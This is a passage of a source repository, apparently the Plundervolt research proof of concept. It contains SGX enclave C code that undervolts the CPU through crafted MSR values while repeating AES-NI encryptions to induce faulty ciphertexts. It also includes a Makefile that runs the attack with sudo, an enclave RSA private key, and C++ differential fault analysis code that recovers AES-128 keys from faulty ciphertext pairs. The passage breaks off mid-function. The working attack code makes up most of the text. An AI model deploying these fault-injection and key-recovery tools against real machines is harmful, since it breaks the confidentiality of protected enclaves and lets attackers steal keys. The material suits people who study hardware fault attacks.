127 | 	va_end(ap);
128 | 	ocall_print_string(buf);
129 | }
130 | 
131 | static void print_m128i(const char *s, __m128i x, const char *f)
132 | {
133 | 	uint8_t xs[16] = {0};
134 | 	char final_string[33];
135 | 	char buf[3];
136 | 
137 | 	_mm_storeu_si128((__m128i *)xs, x);
138 | 
139 | 	for (int i = 0; i < 16; i++)
140 | 	{
141 | 		snprintf(buf, 3, "%02X", xs[i]);
142 | 		final_string[2 * i] = buf[0];
143 | 		final_string[2 * i + 1] = buf[1];
144 | 	}
145 | 	final_string[32] = 0;
146 | 
147 | 	eprintf("%s%s%s", s, final_string, f);
148 | }
149 | 
150 | static void aesdec_print_rounds(__m128i m, __m128i n)
151 | {
152 | 	m = _mm_xor_si128(m, key_schedule[10 + 0]);
153 | 	n = _mm_xor_si128(n, key_schedule[10 + 0]);
154 | 	__m128i x = _mm_xor_si128(m,n);
155 | 	print_m128i("dec: ", m, "");
156 | 	print_m128i("", n, "");
157 | 	print_m128i("10: ", x, ".\n");
158 | 
159 | 	for (int i=1; i < 10; i++)
160 | 	{
161 | 		m = _mm_aesdec_si128(m, key_schedule[10 + i]);
162 | 		n = _mm_aesdec_si128(n, key_schedule[10 + i]);
163 | 		x = _mm_xor_si128(m,n);
164 | 		print_m128i("dec: ", m, "");
165 | 		print_m128i("", n,"");
166 | 		char i_str[5]={0};
167 | 		snprintf(i_str,5 , "%02i: ", 10-i);
168 | 		print_m128i(i_str, x, ".\n");
169 | 	}
170 | 
171 | 	m = _mm_aesdeclast_si128(m, key_schedule[0]);
172 | 	n = _mm_aesdeclast_si128(n, key_schedule[0]);
173 | 	x = _mm_xor_si128(m,n);
174 | 	print_m128i("dec: ", m, "");
175 | 	print_m128i("", n, "");
176 | 	print_m128i("00: ", x, ".\n");
177 | 	
178 | }
179 | 
180 | uint64_t wrmsr_value(int64_t val, uint64_t plane)
181 | {
182 | 	// -0.5 to deal with rounding issues
183 | 	val = (val * 1.024) - 0.5;
184 | 	val = 0xFFE00000 & ((val & 0xFFF) << 21);
185 | 	val = val | 0x8000001100000000;
186 | 	val = val | (plane << 40);
187 | 	return (uint64_t)val;
188 | }
189 | 
190 | 
191 | uint64_t fault_it(int iterations)
192 | {
193 | 	int i = 0;
194 | 
195 | 	__m128i correct_value;
196 | 
197 | 	uint32_t b[16];
198 | 	uint32_t c[16];
199 | 
200 | 	for (size_t j = 0; j < 4; j++)
201 | 	{
202 | 		unsigned randVal;
203 | 		_rdrand32_step(&randVal);
204 | 		b[j] = randVal;
205 | 		c[j] = 0;
206 | 	}
207 | 
208 | 	__m128i plaintext = _mm_loadu_si128((__m128i *)b);
209 | 
210 | 	__m128i result1;
211 | 	__m128i result2;
212 | 
213 | 	result1 = _mm_loadu_si128((__m128i *)b);
214 | 	aes128_load_key(key, key_schedule);
215 | 
216 | 	//////////////////
217 | 	// drop voltage //
218 | 	//////////////////
219 | 	ocall_voltage_change(plane0_offset);
220 | 	ocall_voltage_change(plane2_offset);
221 | 
222 | 	do
223 | 	{
224 | 		i++;
225 | 
226 | 		for (size_t j = 0; j < 4; j++)
227 | 		{
228 | 			unsigned randVal;
229 | 			_rdrand32_step(&randVal);
230 | 			b[j] = randVal;
231 | 		}
232 | 		plaintext = _mm_loadu_si128((__m128i *)b);
233 | 
234 | 		result1 = aes128_enc(plaintext);
235 | 		result2 = aes128_enc(plaintext);
236 | 
237 | 	} while (vec_equal_128(result1, result2) && i < iterations);
238 | 
239 | 	////////////////////
240 | 	// return voltage //
241 | 	////////////////////
242 | 	ocall_voltage_change(plane0_return);
243 | 	ocall_voltage_change(plane2_return);
244 | 
245 | 
246 | 
247 | 	if (!vec_equal_128(result1, result2))
248 | 	{
249 | 		print_m128i("plaintext: ", plaintext, "\n");
250 | 		print_m128i("ciphertext1: ", result1, "\n");
251 | 		print_m128i("ciphertext2: ", result2, "\n");
252 | 		eprintf(">>>>> INCORRECT ENCRYPTION <<<< \n");
253 | 		aesdec_print_rounds(result1, result2);
254 | 	}
255 | 
256 | 	return 1;
257 | }
258 | 
259 | void enclave_calculation(int iterations, int64_t offset)
260 | {
261 | 	// calculate the undervolting values to send to the msr 
262 | 	plane0_return = wrmsr_value(0, 0);
263 | 	plane2_return = wrmsr_value(0, 2);
264 | 	plane0_offset = wrmsr_value(offset, 0);
265 | 	plane2_offset = wrmsr_value(offset, 2);
266 | 
267 | 	uint64_t return_val = fault_it(iterations);
268 | }
269 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/Enclave/encl.edl:
--------------------------------------------------------------------------------
 1 | enclave {
 2 | 	trusted {
 3 |         public void enclave_calculation(int iterations, int64_t offset);
 4 | 	};
 5 | 	
 6 | 	untrusted {
 7 | 	 	void ocall_print_string([in, string] const char *str);
 8 | 		void ocall_voltage_change(uint64_t plane);
 9 | 		void ocall_phex([in,size=len]const uint8_t* print_me, int len);
10 | 	};
11 | };
12 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/Enclave/private_key.pem:
--------------------------------------------------------------------------------
 1 | -----BEGIN RSA PRIVATE KEY-----
 2 | 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
39 | -----END RSA PRIVATE KEY-----
40 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/Enclave/public_key.pem:
--------------------------------------------------------------------------------
 1 | -----BEGIN PUBLIC KEY-----
 2 | MIIBoDANBgkqhkiG9w0BAQEFAAOCAY0AMIIBiAKCAYEAs3hixlUPAP4MefsPx921
 3 | p/1+RNhukwgGjozXCb7svLbjeQ53Fonc2cR19cOr1IVc8PzpdaKt7EZZprNS//3n
 4 | 8Iu8MAncJr1EQ6BpwYhb7L1yZPNYs2luH2USqUJM7Zkmenwd5pwPCOw5zpNMGHAX
 5 | sTeQgZ0j0UG0nvEZ3lL2i5q3jA+MsvZT9NgQLUFhFWjhQ4jscrxbPwtIDCTZx7KT
 6 | J2KONXmPYJF08TstVE0qBjT3P9ac4ojkCFMmnjpq5kEsOYMNrggRIXaOvGvOY4MG
 7 | P5Zy6xupGk7SpWQjz9i4orv2KOdp7faY7vfakJcLRkYaoIhvbqPXCwyrW3RZT3Sa
 8 | dIj3nPCIy5IJd2WVY1HyC449g9fZqggVzuLIbtJo/Ooboo6XosPcsb2we9aWWQh4
 9 | G7k9xZwc1q+cG2Qmt83B49yjkhl43ylLhoBuPf09yjlC1kjkoN24NIHuTNfzVDAo
10 | qMlH3zT0SchhlMMGHqRUhEE4wv+SDwWBoS7S0eyNmCpHAgED
11 | -----END PUBLIC KEY-----
12 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/Makefile:
--------------------------------------------------------------------------------
 1 | URTS_LIB_PATH        = ~/sgx-step/linux-sgx/psw/urts/linux
 2 | 
 3 | ifeq ($(SGX_SDK),)
 4 |     SGX_SDK          = /opt/intel/sgxsdk
 5 | endif
 6 | export SGX_SDK
 7 | ifneq ($(SGX_SDK), /opt/intel/sgxsdk)
 8 |     URTS_LD_LIBRARY_PATH = LD_LIBRARY_PATH=$(LIBSGXSTEP_DIR)/linux-sgx/psw/urts/linux
 9 | endif
10 | 
11 | ENCLAVE              = Enclave
12 | SUBDIRS              = $(ENCLAVE) $(LIBSGXSTEP)
13 | 
14 | CC                   = gcc
15 | AS                   = gcc
16 | LD                   = gcc
17 | 
18 | ifeq ($(M32), 1)
19 | 	CFLAGS   = -m32 -DM32=$(M32)
20 | 	LDFLAGS  = -m32 
21 | else
22 | 	LIB_SUFX = 64
23 | endif
24 | 
25 | LDFLAGS		    += -lncurses
26 | CFLAGS              += -fPIC -fno-stack-protector -fno-builtin -fno-jump-tables \
27 |                        -fno-common -Wno-attributes -g -D_GNU_SOURCE -O0 -mavx2 -march=haswell 
28 | INCLUDE             += -I$(SGX_SDK)/include/ -I$(LIBSGXSTEP_DIR) 
29 | LDFLAGS             +=  -lencl_proxy -lsgx_urts \
30 |                        -lsgx_uae_service -pthread $(SUBDIRS:%=-L %) -L$(SGX_SDK)/lib$(LIB_SUFX)/ \
31 |                        -L$(URTS_LIB_PATH)
32 | 
33 | SOURCES              = $(shell ls *.c)
34 | CXXSOURCES              = $(shell ls *.cpp)
35 | OBJECTS              = $(SOURCES:.c=.o)
36 | CXXOBJECTS              = $(CXXSOURCES:.cpp=.o)
37 | OUTPUT               = app
38 | 
39 | BUILDDIRS            = $(SUBDIRS:%=build-%)
40 | CLEANDIRS            = $(SUBDIRS:%=clean-%)
41 | 
42 | .SILENT:
43 | 
44 | all: $(OUTPUT)
45 | 	
46 | run: clean all
47 | 	sudo $(URTS_LD_LIBRARY_PATH) ./$(OUTPUT) 500 -255
48 | 
49 | debug: clean all
50 | 	sudo `which sgx-gdb` ./$(OUTPUT)
51 | 
52 | $(OUTPUT): $(BUILDDIRS) $(OBJECTS)
53 | 	echo "$(INDENT)[LD]" $(OBJECTS) $(LIBS) -o $(OUTPUT) 
54 | 	$(LD) $(OBJECTS) $(LDFLAGS) -o $(OUTPUT) 
55 | 
56 | %.o : %.c 
57 | 	echo "$(INDENT)[CC] " $<
58 | 	$(CC) $(CFLAGS) $(INCLUDE) -c $<
59 | 
60 | %.o : %.cpp 
61 | 	echo "$(INDENT)[CC] " $<
62 | 	$(CC) $(CFLAGS) $(INCLUDE) -c $<
63 | 
64 | %.o : %.S
65 | 	echo "$(INDENT)[AS] " $<
66 | 	$(AS) $(INCLUDE) -c $< -o $@
67 | 
68 | clean: $(CLEANDIRS)
69 | 	echo "$(INDENT)[RM]" $(OBJECTS) $(OUTPUT)
70 | 	rm -f $(OBJECTS) $(OUTPUT)
71 | 
72 | $(BUILDDIRS):
73 | 	echo "$(INDENT)[===] $(@:build-%=%) [===]"
74 | 	$(MAKE) -C $(@:build-%=%) INDENT+="$(INDENT_STEP)" M32=$(M32) curr-dir=$(curr-dir)/$(@:build-%=%)
75 | 
76 | $(CLEANDIRS):
77 | 	echo "$(INDENT)[===] $(@:clean-%=%) [===]"
78 | 	
79 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/dfa-aes-master/LICENSE:
--------------------------------------------------------------------------------
 1 | 
 2 | Copyright (c) 2013 Philipp Jovanovic (jovanovic@fim.uni-passau.de)
 3 | 
 4 | Permission is hereby granted, free of charge, to any person obtaining a copy of
 5 | this software and associated documentation files (the "Software"), to deal in
 6 | the Software without restriction, including without limitation the rights to
 7 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
 8 | the Software, and to permit persons to whom the Software is furnished to do so,
 9 | subject to the following conditions:
10 | 
11 | The above copyright notice and this permission notice shall be included in all
12 | copies or substantial portions of the Software.
13 | 
14 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
15 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
16 | FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
17 | COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
18 | IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
19 | CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
20 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/dfa-aes-master/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | #### C++ implementation of [Differential Fault Analysis][1] (DFA) of AES-128 using a single fault injection. Software features multi-core support via [OpenMP][2].
 3 | ---
 4 | 
 5 | #### LICENSE
 6 | This program is free software; see [LICENSE][3] for more details.
 7 | 
 8 | #### REQUIREMENTS
 9 | * gcc-4.8.1 or newer.
10 | * [OpenMP][2].
11 | * Python 2.7.5 or newer. (optionally)
12 | * Workstation with at least 32 cores. (recommended)
13 | 
14 | #### USAGE
15 | **Note**: Some computations might take quite some time, especially in the case
16 | where the fault location is not known and if too few cores are available. For
17 | comparison:
18 | * **Example 1** takes *17.5 seconds* for a *known fault location* and *279
19 |   seconds* for an *unknown fault location* using 32 cores (with 2.1 GHz each,
20 |   Opteron 6172).
21 | * **Example 2** takes *784 seconds* for *unknown fault locations* using 40 cores
22 |   of the same machine as above.
23 | 
24 | ##### Example 1
25 | Differential fault analysis of a single ciphertext pair (see input-1.csv) on 32
26 | cores. A fault was injected in byte 11 during the 8-th round of the AES
27 | encryption process.
28 | 
29 |     cd analysis
30 |     make
31 |     cd ../examples
32 |     ./dfa 32 11 input-1.csv
33 | 
34 | After the computation is finished all remaining masterkeys are written to the
35 | file keys-0.csv including the correct one:
36 | 
37 |     keys-0.csv: 10000005200000063000000740000008
38 | 
39 | The ciphertext pair in input-1.csv was generated by
40 | 
41 |     cd simulator
42 |     ./inject 7 11 >> ../examples/input-1.csv
43 | 
44 | ##### Example 2
45 | DFA of multiple ciphertext pairs with distinct keys (see input-2.csv) on 40
46 | cores. Faults were injected at unknown locations (input -1) during the 8-th
47 | round of the AES encryption process.
48 | 
49 |     cd analysis
50 |     make
51 |     cd ../examples
52 |     ./dfa 40 -1 input-2.csv
53 | 
54 | After the computation is finished the remaining masterkeys of pair {0,1,2}
55 | are written to keys-{0,1,2}.csv. The correct keys are:
56 | 
57 |     keys-0.csv: 1234567890abcdef1234567890abcdef
58 |     keys-1.csv: deadc0dedeadc0dedeadc0dedeadc0de
59 |     keys-2.csv: 10000005200000063000000740000008
60 | 
61 | The data in input-2.csv was generated by
62 | 
63 |     cd simulator
64 |     ./inject 2 5 >> ../examples/input-2.csv
65 |     ./inject 6 8 >> ../examples/input-2.csv
66 |     ./inject 7 12 >> ../examples/input-2.csv
67 | 
68 | #### Contact
69 | Philipp Jovanovic via <jovanovic@fim.uni-passau.de>
70 | 
71 | [1]: http://eprint.iacr.org/2009/575
72 | [2]: http://openmp.org/
73 | [3]: https://github.com/Daeinar/dfa-aes/blob/master/LICENSE
74 | 


--------------------------------------------------------------------------------
/sgx_aes_ni/dfa-aes-master/analysis/dfa:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KitMurdock/plundervolt/a7313c268d7c27ac3eb806d3ed99019788c5f605/sgx_aes_ni/dfa-aes-master/analysis/dfa


--------------------------------------------------------------------------------
/sgx_aes_ni/dfa-aes-master/analysis/dfa.cpp:
--------------------------------------------------------------------------------
  1 | //
  2 | // Licensed by "The MIT License". See file LICENSE.
  3 | //
  4 | 
  5 | #include "dfa.hpp"
  6 | 
  7 | /* start of differential fault analysis */
  8 | vector<State> analyse(State &c, State &d, const size_t l, const size_t cores){
  9 | 
 10 |   printf("Applying standard filter. ");
 11 |   vector<VKeyTuple> cmb = combine( standard_filter( differentials(c,d,l) ) );
 12 |   printf("Done.\n");
 13 |   size_t n = cmb[0].size() * cmb[1].size() * cmb[2].size() * cmb[3].size();
 14 |   printf("Size of keyspace: %lu = 2^%f \n",n, log2(n));
 15 | 
 16 |   printf("Applying improved filter. ");
 17 |   fflush(stdout);
 18 | 
 19 |   /* pre-processing */
 20 |   vector<vector<VKeyTuple>> sliced_cmb = preproc(cmb,cores);
 21 | 
 22 |   /* set openmp parameters and feed sliced key space in parallel to the improved filter */
 23 |   vector<vector<State>> r;
 24 |   omp_set_num_threads(cores);
 25 | 
 26 | #pragma omp parallel for ordered
 27 |   for (size_t i = 0; i < sliced_cmb.size(); ++i )
 28 |   {
 29 |     vector<State> v = improved_filter(c,d,sliced_cmb[i],l);
 30 | #pragma omp ordered
 31 |     r.push_back(v);
 32 |   }
 33 |   printf("Done.\n");
 34 | 
 35 |   /* post-processing */
 36 |   vector<State> v = postproc(r);
 37 |   printf("Size of keyspace: %lu = 2^%f \n",v.size(), log2(v.size()));
 38 |   return v;
 39 | }
 40 | 
 41 | 
 42 | /* differentials */
 43 | DiffStat differentials(State &c, State &d, const size_t l) {
 44 | 
 45 |   /* choose inverse deltas depending on the fault location 'l' */
 46 |   const uint8_t** gm = ideltas1[ map_fault[l] ];
 47 | 
 48 |   /* init differential matrix */
 49 |   DiffStat x;
 50 |   for (size_t i = 0; i < 16; ++i)
 51 |   {
 52 |     multimap<uint8_t,uint8_t> v;
 53 |     x[i] = v;
 54 |   }
 55 | 
 56 |   for (size_t i = 0; i < 256; ++i)
 57 |   {
 58 |     uint8_t k = (uint8_t) i;
 59 | 
 60 |     x[ 0].insert( pair<uint8_t,uint8_t>( EQ( c[ 0], d[ 0], k, gm[ 0] ), k ) );
 61 |     x[ 1].insert( pair<uint8_t,uint8_t>( EQ( c[ 1], d[ 1], k, gm[ 1] ), k ) );
 62 |     x[ 2].insert( pair<uint8_t,uint8_t>( EQ( c[ 2], d[ 2], k, gm[ 2] ), k ) );
 63 |     x[ 3].insert( pair<uint8_t,uint8_t>( EQ( c[ 3], d[ 3], k, gm[ 3] ), k ) );
 64 | 
 65 |     x[ 4].insert( pair<uint8_t,uint8_t>( EQ( c[ 4], d[ 4], k, gm[ 4] ), k ) );
 66 |     x[ 5].insert( pair<uint8_t,uint8_t>( EQ( c[ 5], d[ 5], k, gm[ 5] ), k ) );
 67 |     x[ 6].insert( pair<uint8_t,uint8_t>( EQ( c[ 6], d[ 6], k, gm[ 6] ), k ) );
 68 |     x[ 7].insert( pair<uint8_t,uint8_t>( EQ( c[ 7], d[ 7], k, gm[ 7] ), k ) );
 69 | 
 70 |     x[ 8].insert( pair<uint8_t,uint8_t>( EQ( c[ 8], d[ 8], k, gm[ 8] ), k ) );
 71 |     x[ 9].insert( pair<uint8_t,uint8_t>( EQ( c[ 9], d[ 9], k, gm[ 9] ), k ) );
 72 |     x[10].insert( pair<uint8_t,uint8_t>( EQ( c[10], d[10], k, gm[10] ), k ) );
 73 |     x[11].insert( pair<uint8_t,uint8_t>( EQ( c[11], d[11], k, gm[11] ), k ) );
 74 | 
 75 |     x[12].insert( pair<uint8_t,uint8_t>( EQ( c[12], d[12], k, gm[12] ), k ) );
 76 |     x[13].insert( pair<uint8_t,uint8_t>( EQ( c[13], d[13], k, gm[13] ), k ) );
 77 |     x[14].insert( pair<uint8_t,uint8_t>( EQ( c[14], d[14], k, gm[14] ), k ) );
 78 |     x[15].insert( pair<uint8_t,uint8_t>( EQ( c[15], d[15], k, gm[15] ), k ) );
 79 |   }
 80 |   return x;
 81 | }
 82 | 
 83 | 
 84 | /* standard filter */
 85 | DiffStat standard_filter(DiffStat x)
 86 | {
 87 |   /* iterate over columns */
 88 |   for (size_t i = 0; i < 4; ++i)
 89 |   {
 90 |     /* init set of valid indices */
 91 |     set<uint8_t> s;
 92 |     for (size_t j = 0; j < 256; ++j) { s.insert( (uint8_t)j ); }
 93 | 
 94 |     /* compute valid indices for a given column i */
 95 |     for (size_t j = 0; j < 4; ++j)
 96 |     {
 97 |       vector<uint8_t> keys = getKeys( x[ rb[i][j] ] );
 98 |       set<uint8_t> t( begin(keys), end(keys) );
 99 |       set<uint8_t> r;
100 |       set_intersection( s.begin(), s.end(), t.begin(), t.end(), inserter( r, r.begin() ) );
101 |       s = r;
102 |     }
103 | 
104 |     /* erase invalid entries */
105 |     for (size_t j = 0; j < 4; ++j)
106 |     {
107 |       vector<uint8_t> keys = getKeys( x[ rb[i][j] ] );
108 |       set<uint8_t> t( begin(keys), end(keys) );
109 |       set<uint8_t> r;
110 |       set_difference( t.begin(), t.end(), s.begin(), s.end(), inserter( r, r.begin() ) );
111 |       vector<uint8_t> toDel( begin(r), end(r) );
112 |       //cout << "from: " << getKeys(x[ rb[i][j] ]).size();
113 |       for ( size_t k = 0; k < toDel.size(); ++k) { x[ rb[i][j] ].erase(toDel[k]); }
114 |       //cout << " to: " << getKeys(x[ rb[i][j] ]).size() << endl;
115 |     }
116 |   }
117 |   return x;
118 | }
119 | 
120 | 
121 | /* computes the cartesian product of all remaining key candidates of related elements */
122 | vector<VKeyTuple> combine(DiffStat m)
123 | {
124 |   vector<VKeyTuple> result;
125 | 
126 |   /* iterate over columns */
127 |   for (size_t i = 0; i < 4; ++i)
128 |   {
129 |     VKeyTuple v;
130 | 
131 |     auto w = m[ rb[i][0] ];
132 |     auto x = m[ rb[i][1] ];
133 |     auto y = m[ rb[i][2] ];
134 |     auto z = m[ rb[i][3] ];
135 | 
136 |     vector<uint8_t> wk = getKeys( w );
137 | 
138 |     for (size_t j = 0; j < wk.size(); ++j)
139 |     {
140 |       /* extract elements with the same key and combine them */
141 |       auto retw = w.equal_range(wk[j]);
142 |       auto retx = x.equal_range(wk[j]);
143 |       auto rety = y.equal_range(wk[j]);
144 |       auto retz = z.equal_range(wk[j]);
145 | 
146 |       for (auto iw = retw.first; iw != retw.second; ++iw)
147 |       {
148 |         for (auto ix = retx.first; ix != retx.second; ++ix)
149 |         {
150 |           for (auto iy = rety.first; iy != rety.second; ++iy)
151 |           {
152 |             for (auto iz = retz.first; iz != retz.second; ++iz)
153 |             {
154 |               KeyTuple t;
155 |               t[0] = iw->second; t[1] = ix->second; t[2] = iy->second; t[3] = iz->second;
156 |               v.push_back(t);
157 |             }
158 |           }
159 |         }
160 |       }
161 |     }
162 |     result.push_back(v);
163 |   }
164 |   return result;
165 | }
166 | 
167 | 
168 | /* prepare data for application of improved filter on multiple cores */
169 | vector<vector<VKeyTuple>> preproc(vector<VKeyTuple> cmb, size_t cores)
170 | {
171 |   vector<VKeyTuple> slices;
172 |   for (size_t i = 0; i < cores; ++i) { VKeyTuple v; slices.push_back(v); }
173 | 
174 |   size_t n = cmb[0].size() / cores;
175 |   size_t m = cmb[0].size() % cores;
176 | 
177 |   /* distribute elements of the first column */
178 |   for (size_t i = 0; i < n; ++i)
179 |     for (size_t j = 0; j < cores; ++j)
180 |       slices[j].push_back( cmb[0][cores*i+j] );
181 | 
182 |   /* distribute the remaining elements, too */
183 |   for (size_t j = 0; j < m; ++j)
184 |     slices[j].push_back( cmb[0][cores*n+j] );
185 | 
186 |   vector<vector<VKeyTuple>> slices_cmb;
187 |   for (size_t i = 0; i < slices.size(); ++i)
188 |   {
189 |     vector<VKeyTuple> v;
190 |     v.push_back(slices[i]);
191 |     v.push_back(cmb[1]);
192 |     v.push_back(cmb[2]);
193 |     v.push_back(cmb[3]);
194 |     slices_cmb.push_back(v);
195 |   }
196 |   return slices_cmb;
197 | }
198 | 
199 | 
200 | /* improved filter */
201 | vector<State> improved_filter(State &c, State &d, vector<VKeyTuple> &v, const size_t l) {
202 | 
203 |   /* configure fault equations depending on the fault location 'l' */
204 | 
205 |   const uint8_t** gm = ideltas2[ l%4 ];        // inverse deltas
206 |   const size_t* x = indices_x[ map_fault[l] ]; // indices for c,d and k
207 |   const size_t* y = indices_y[ map_fault[l] ]; // indices for h
208 | 
209 |   vector<State> candidates;
210 | 
211 |   for (size_t i0 = 0; i0 < v[0].size(); ++i0) {
212 |     for (size_t i1 = 0; i1 < v[1].size(); ++i1) {
213 |       for (size_t i2 = 0; i2 < v[2].size(); ++i2) {
214 |         for (size_t i3 = 0; i3 < v[3].size(); ++i3) {
215 | 
216 |         /* index order of the tuples in 'key': (0,7,10,13),(1,4,11,14),(2,5,8,15),(3,6,9,12) */
217 | 
218 |         /* 10-th round key */
219 |         State k = {
220 |           v[0][i0][0], v[1][i1][0], v[2][i2][0], v[3][i3][0],   /*  0  1  2  3 */
221 |           v[1][i1][1], v[2][i2][1], v[3][i3][1], v[0][i0][1],   /*  4  5  6  7 */
222 |           v[2][i2][2], v[3][i3][2], v[0][i0][2], v[1][i1][2],   /*  8  9 10 11 */
223 |           v[3][i3][3], v[0][i0][3], v[1][i1][3], v[2][i2][3] }; /* 12 13 14 15 */
224 | 
225 |         /* 9-th round key */
226 |         State h;
227 |         h[ 0] = k[ 0] ^ sbox[ k[ 9] ^ k[13] ] ^0x36;
228 |         h[ 1] = k[ 1] ^ sbox[ k[10] ^ k[14] ];
229 |         h[ 2] = k[ 2] ^ sbox[ k[11] ^ k[15] ];
230 |         h[ 3] = k[ 3] ^ sbox[ k[ 8] ^ k[12] ] ;
231 |         h[ 4] = k[ 0] ^ k[ 4];
232 |         h[ 5] = k[ 1] ^ k[ 5];
233 |         h[ 6] = k[ 2] ^ k[ 6];
234 |         h[ 7] = k[ 3] ^ k[ 7];
235 |         h[ 8] = k[ 4] ^ k[ 8];
236 |         h[ 9] = k[ 5] ^ k[ 9];
237 |         h[10] = k[ 6] ^ k[10];
238 |         h[11] = k[ 7] ^ k[11];
239 |         h[12] = k[ 8] ^ k[12];
240 |         h[13] = k[ 9] ^ k[13];
241 |         h[14] = k[10] ^ k[14];
242 |         h[15] = k[11] ^ k[15];
243 | 
244 |         uint8_t f0 = gm[0][
245 |           isbox[
246 |           gm_0e[ isbox[ c[ x[ 0] ] ^ k[ x[ 0] ] ] ^ h[ y[ 0] ] ] ^
247 |           gm_0b[ isbox[ c[ x[ 1] ] ^ k[ x[ 1] ] ] ^ h[ y[ 1] ] ] ^
248 |           gm_0d[ isbox[ c[ x[ 2] ] ^ k[ x[ 2] ] ] ^ h[ y[ 2] ] ] ^
249 |           gm_09[ isbox[ c[ x[ 3] ] ^ k[ x[ 3] ] ] ^ h[ y[ 3] ] ] ] ^
